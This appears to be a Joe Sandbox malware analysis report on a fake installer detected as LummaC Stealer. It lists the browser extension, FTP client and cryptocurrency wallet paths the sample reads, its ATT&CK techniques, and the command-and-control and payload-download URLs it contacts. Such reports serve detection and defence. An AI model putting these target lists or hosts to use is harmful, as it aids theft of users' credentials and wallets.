Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 1.2.Exlan_setup_v3.1.2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Exlan_setup_v3.1.2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1690736705.0000000004273000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Code function: 0_2_6CFBA0C0 CorBindToRuntimeEx,GetModuleHandleW,GetModuleHandleW,__cftoe,GetModuleHandleW,GetProcAddress,

0_2_6CFBA0C0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 Scheduled Task/Job	11 Process Injection	12 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Native API	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	12 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	4 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	2 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	33 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Exlan_setup_v3.1.2.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://cialis26.us/es(	0%	Avira URL Cloud	safe
https://cialis26.us:443/file/nixsudocrypt.exe	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/apiC:	100%	Avira URL Cloud	malware
justyffyr.click	100%	Avira URL Cloud	malware
https://cialis26.us/f1	0%	Avira URL Cloud	safe
https://cialis26.us/file/nixsudocrypt.exe2	0%	Avira URL Cloud	safe
https://lev-tolstoi.com:443/apin.txtPK	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/L	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/apir	100%	Avira URL Cloud	malware
https://cialis26.us/e	0%	Avira URL Cloud	safe
https://cialis26.us/file/nixsudocrypt.exets	0%	Avira URL Cloud	safe
https://cialis26.us/file/nixsudocrypt.exea5	0%	Avira URL Cloud	safe
https://cialis26.us/file/nixsudocrypt.exe	100%	Avira URL Cloud	malware
https://cialis26.us/odedo	0%	Avira URL Cloud	safe
https://lev-tolstoi.com:443/apis92o4p.default-release/key4.dbPK	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	104.102.49.254	true	false	high
lev-tolstoi.com	172.67.157.254	true	false	high
wordyfindy.lat	unknown	unknown	false	high
slipperyloo.lat	unknown	unknown	false	high
curverpluch.lat	unknown	unknown	false	high
tentabatte.lat	unknown	unknown	false	high
manyrestro.lat	unknown	unknown	false	high
bashfulacid.lat	unknown	unknown	false	high
justyffyr.click	unknown	unknown	true	unknown
shapestickyr.lat	unknown	unknown	false	high
talkynicer.lat	unknown	unknown	false	high
cialis26.us	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://steamcommunity.com/profiles/76561199724331900	false		high
wordyfindy.lat	false		high
slipperyloo.lat	false		high
curverpluch.lat	false		high
tentabatte.lat	false		high
manyrestro.lat	false		high
justyffyr.click	true	Avira URL Cloud: malware	unknown
shapestickyr.lat	false		high
talkynicer.lat	false		high
https://lev-tolstoi.com/api	false		high
bashfulacid.lat	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://lev-tolstoi.com:443/apin.txtPK	Exlan_setup_v3.1.2.exe, 00000001.00000002.1807485559.000000000147C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cialis26.us/es(	Exlan_setup_v3.1.2.exe, 00000001.00000002.1807912966.00000000014F9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/14436606/23354	Exlan_setup_v3.1.2.exe, 00000000.00000002.1695220822.00000000061B0000.00000004.08000000.00040000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1674099835.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004348000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	Exlan_setup_v3.1.2.exe, 00000000.00000002.1695220822.00000000061B0000.00000004.08000000.00040000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004348000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cialis26.us/e	Exlan_setup_v3.1.2.exe, 00000001.00000002.1807912966.00000000014F9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cialis26.us:443/file/nixsudocrypt.exe	Exlan_setup_v3.1.2.exe, 00000001.00000002.1807485559.000000000147C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://lev-tolstoi.com/	Exlan_setup_v3.1.2.exe, 00000001.00000002.1807664250.000000000149F000.00000004.00000020.00020000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000001.00000002.1807912966.00000000014F9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/apiC:	Exlan_setup_v3.1.2.exe, 00000001.00000002.1807847132.00000000014F4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cialis26.us/f1	Exlan_setup_v3.1.2.exe, 00000001.00000002.1807912966.00000000014F9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cialis26.us/file/nixsudocrypt.exe2	Exlan_setup_v3.1.2.exe, 00000001.00000002.1807485559.000000000147C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-net	Exlan_setup_v3.1.2.exe, 00000000.00000002.1695220822.00000000061B0000.00000004.08000000.00040000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004348000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/apir	Exlan_setup_v3.1.2.exe, 00000001.00000002.1807912966.00000000014F9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://lev-tolstoi.com/L	Exlan_setup_v3.1.2.exe, 00000001.00000002.1807912966.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000001.00000002.1807664250.00000000014C1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cialis26.us/file/nixsudocrypt.exets	Exlan_setup_v3.1.2.exe, 00000001.00000002.1807912966.00000000014F9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cialis26.us/file/nixsudocrypt.exea5	Exlan_setup_v3.1.2.exe, 00000001.00000002.1807912966.00000000014F9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cialis26.us/odedo	Exlan_setup_v3.1.2.exe, 00000001.00000002.1807912966.00000000014F9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-neti	Exlan_setup_v3.1.2.exe, 00000000.00000002.1695220822.00000000061B0000.00000004.08000000.00040000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004348000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com:443/api	Exlan_setup_v3.1.2.exe, 00000001.00000002.1807485559.000000000147C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	Exlan_setup_v3.1.2.exe, 00000000.00000002.1695220822.00000000061B0000.00000004.08000000.00040000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004348000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	Exlan_setup_v3.1.2.exe, 00000000.00000002.1695220822.00000000061B0000.00000004.08000000.00040000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000000.00000002.1690736705.0000000004348000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.newtonsoft.com/jsonschema	Exlan_setup_v3.1.2.exe	false		high
https://cialis26.us/file/nixsudocrypt.exe	Exlan_setup_v3.1.2.exe, 00000001.00000002.1807912966.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000001.00000002.1807257078.000000000115A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.nuget.org/packages/Newtonsoft.Json.Bson	Exlan_setup_v3.1.2.exe	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Exlan_setup_v3.1.2.exe, 00000000.00000002.1674099835.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com:443/apis92o4p.default-release/key4.dbPK	Exlan_setup_v3.1.2.exe, 00000001.00000002.1807485559.000000000147C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.157.254	lev-tolstoi.com	United States		13335	CLOUDFLARENETUS	false
104.102.49.254	steamcommunity.com	United States		16625	AKAMAI-ASUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582636
Start date and time:	2024-12-31 08:16:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Exlan_setup_v3.1.2.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@12/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 88% Number of executed functions: 132 Number of non-executed functions: 126
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:16:57	API Interceptor	9x Sleep call for process: Exlan_setup_v3.1.2.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.157.254	GPU-Z.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer	Browse
	Loader.exe	Get hash	malicious	LummaC	Browse
	MPgkx6bQIQ.exe	Get hash	malicious	LummaC	Browse
	l0zocrLiVW.exe	Get hash	malicious	LummaC	Browse
	XYQ1pqHNiT.exe	Get hash	malicious	LummaC	Browse
	5Z19n7XRT1.exe	Get hash	malicious	LummaC	Browse
	TdloJt4gY3.exe	Get hash	malicious	LummaC	Browse
	726odELDs8.exe	Get hash	malicious	LummaC	Browse
	Tqa1vDp9NT.exe	Get hash	malicious	LummaC	Browse
	YrWaRb0IKJ.exe	Get hash	malicious	LummaC	Browse
104.102.49.254	r4xiHKy8aM.exe	Get hash	malicious	Socks5Systemz	Browse	/ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
lev-tolstoi.com	GPU-Z.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer	Browse	172.67.157.254
	gdi32.dll	Get hash	malicious	LummaC	Browse	104.21.66.86
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	Crosshair-X.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	iien1HBbB3.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	oe9KS7ZHUc.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	MPgkx6bQIQ.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	l0zocrLiVW.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	XYQ1pqHNiT.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	GHXsFkoroU.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
steamcommunity.com	Bootstrapper.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	GPU-Z.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer	Browse	104.102.49.254
	gdi32.dll	Get hash	malicious	LummaC	Browse	23.55.153.106
	Loader.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Crosshair-X.exe	Get hash	malicious	LummaC	Browse	104.121.10.34
	iien1HBbB3.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	oe9KS7ZHUc.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	MPgkx6bQIQ.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	l0zocrLiVW.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	SQHE4Hsjo6.exe	Get hash	malicious	LummaC	Browse	23.55.153.106

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	RtU8kXPnKr.exe	Get hash	malicious	Quasar	Browse	104.26.12.205
	http://ghostbin.cafe24.com/	Get hash	malicious	Unknown	Browse	104.18.27.193
	http://parrottalks.info	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://gogl.to/3HGT	Get hash	malicious	CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT	Browse	104.17.208.240
	Fizzy Loader.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.138.232
	Loader.exe	Get hash	malicious	Meduza Stealer	Browse	104.26.13.205
	https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Set-up.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.177.88
	X-mas_2.3.2.exe	Get hash	malicious	LummaC	Browse	172.67.190.223
AKAMAI-ASUS	https://gogl.to/3HGT	Get hash	malicious	CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT	Browse	184.28.90.27
	Bootstrapper.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	kwari.arm7.elf	Get hash	malicious	Mirai	Browse	104.64.19.63
	https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.com	Get hash	malicious	Unknown	Browse	23.32.221.157
	botx.mips.elf	Get hash	malicious	Mirai	Browse	72.247.1.141
	loligang.ppc.elf	Get hash	malicious	Mirai	Browse	23.54.12.227
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	23.211.115.2
	sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	23.218.100.64
	m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	23.6.144.120
	GPU-Z.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer	Browse	104.102.49.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Set-up.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	172.67.157.254 104.102.49.254
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 104.102.49.254
	X-mas_2.3.2.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 104.102.49.254
	ReploidReplic.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 104.102.49.254
	Bootstrapper.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 104.102.49.254
	Launcher.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 104.102.49.254
	GTA-5-Mod-Menu-2025.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 104.102.49.254
	AquaDiscord-2.0.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 104.102.49.254
	hoEtvOOrYH.exe	Get hash	malicious	SmokeLoader	Browse	172.67.157.254 104.102.49.254
	web44.mp4.hta	Get hash	malicious	LummaC	Browse	172.67.157.254 104.102.49.254

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	LisectAVT_2403002A_482.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse
	86KZvDaOZR.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse
	CHA0VZiz8y.exe	Get hash	malicious	CryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Vidar	Browse
	SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe	Get hash	malicious	CryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse
	SecuriteInfo.com.Win32.Malware-gen.198.6512.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse
	BI6oo9z4In.exe	Get hash	malicious	CryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse
	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse
	t0R4HiIJp7.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse
	file.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Download File

Process:	C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	760320
Entropy (8bit):	6.561572491684602
Encrypted:	false
SSDEEP:	12288:wCMz4nuvURpZ4jR1b2Ag+dQMWCD8iN2+OeO+OeNhBBhhBBgoo+A1AW8JwkaCZ+36:wCs4uvW4jfb2K90oo+C8JwUZc0
MD5:	544CD51A596619B78E9B54B70088307D
SHA1:	4769DDD2DBC1DC44B758964ED0BD231B85880B65
SHA-256:	DFCE2D4D06DE6452998B3C5B2DC33EAA6DB2BD37810D04E3D02DC931887CFDDD
SHA-512:	F56D8B81022BB132D40AA78596DA39B5C212D13B84B5C7D2C576BBF403924F1D22E750DE3B09D1BE30AEA359F1B72C5043B19685FC9BF06D8040BFEE16B17719
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: LisectAVT_2403002A_482.exe, Detection: malicious, Browse Filename: 86KZvDaOZR.exe, Detection: malicious, Browse Filename: CHA0VZiz8y.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, Detection: malicious, Browse Filename: BI6oo9z4In.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: t0R4HiIJp7.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v...2...2...2...]...6....f..0...)=..,...)=....;...;...2.~.C...)=..i...)=......)=..3...)=..3...Rich2...........PE..L....#da...........!.....(...n...............@......................................(.....@.............................C.......x................................n...B..................................@............@...............................text....&.......(.................. ..`.rdata......@.......,..............@..@.data...`...........................@....rsrc...............................@..@.reloc..R...........................@..B........................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.009356895446019
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.87% Win32 Executable (generic) a (10002005/4) 49.83% InstallShield setup (43055/19) 0.21% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Exlan_setup_v3.1.2.exe
File size:	5'136'896 bytes
MD5:	f86e00a8bf2edc5379395d27f517a170
SHA1:	98362ae7984b73aa461ca2aeeed2acc08aa0cc73
SHA256:	55167bd32c236720792dbcd9318114b75ac5784c7c8be5f82b1f515aefcbf281
SHA512:	612ff5e2abf654c96144827bf09f316817fcdd911eba60a4d0504d5ddf98479830137156f8bd1eff0accbecf11b3d57ce999c2dbb03906919c62221731c9a731
SSDEEP:	49152:4NuYWEYKkHFfTvBJEvUf2vtY7uRfbQswUZcSByYGv5uuv/DYi35PB+MTRx2VT4G8:4NhWqQFfTjEvUfH7ul5ApZde
